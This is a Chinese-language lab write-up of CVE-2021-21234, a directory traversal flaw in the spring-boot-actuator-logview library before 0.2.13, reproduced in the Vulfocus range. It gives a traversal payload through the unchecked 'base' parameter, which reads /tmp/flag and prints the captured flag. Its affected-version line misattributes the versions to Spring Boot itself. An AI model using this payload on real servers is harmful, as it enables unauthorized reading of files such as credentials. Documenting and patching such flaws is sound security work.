1.1漏洞描述
漏洞编号 | CVE-2021-21234 |
漏洞类型 | 目录遍历 |
漏洞等级 | ⭐⭐⭐⭐⭐ |
漏洞环境 | VULFOCUS |
攻击方式 |
描述: Spring Boot是由Pivotal团队提供的全新框架,其设计目的是用来简化新Spring应用的初始搭建以及开发过程。该框架使用了特定的方式来进行配置,从而使开发人员不再需要定义样板化的配置。通过这种方式,Spring Boot致力于在蓬勃发展的快速应用开发领域(rapid application development)成为领导者。 spring-boot-actuator-logview 在一个库中添加了一个简单的日志文件查看器作为 spring boot 执行器端点。它是 maven 包“eu.hinsch:spring-boot-actuator-logview”。在 0.2.13 版本之前的 spring-boot-actuator-logview 中存在目录遍历漏洞。该库的本质是通过 admin(spring boot 执行器)HTTP 端点公开日志文件目录。要查看的文件名和基本文件夹(相对于日志文件夹根)都可以通过请求参数指定。虽然检查了文件名参数以防止目录遍历攻击(因此`filename=../somefile` 将不起作用),但没有充分检查基本文件夹参数,因此`filename=somefile&base=../` 可以访问日志记录基目录之外的文件)。该漏洞已在 0.2.13 版中修复。0.2.12 的任何用户都应该能够毫无问题地进行更新,因为该版本中没有其他更改。除了更新或删除依赖项之外,没有解决此漏洞的方法。但是,删除运行应用程序的用户对运行应用程序不需要的任何目录的读取访问权限可以限制影响。此外,可以通过在反向代理后面部署应用程序来限制对 logview 端点的访问。
1.2漏洞等级
高危
1.3影响版本
Spring Boot0.2.13 版本之前
1.4漏洞复现
1.4.1.基础环境
靶场 | VULFOCUS |
工具 | BurpSuite |
1.4.2.前提
1.5深度利用
1.5.1漏洞点
filename=somefile&base=../` 可以访问日志记录基目录之外的文件
查看tmp/flag
filename=/tmp/flag&base=../../../../../../../../../../
拿到flag
flag-{bmh34f55563-7333-4ec7-8b5c-69ed915b01fb}
1.6漏洞挖掘
1.6.1指纹信息
1.7修复建议
-
升级
-
打补丁
-
上设备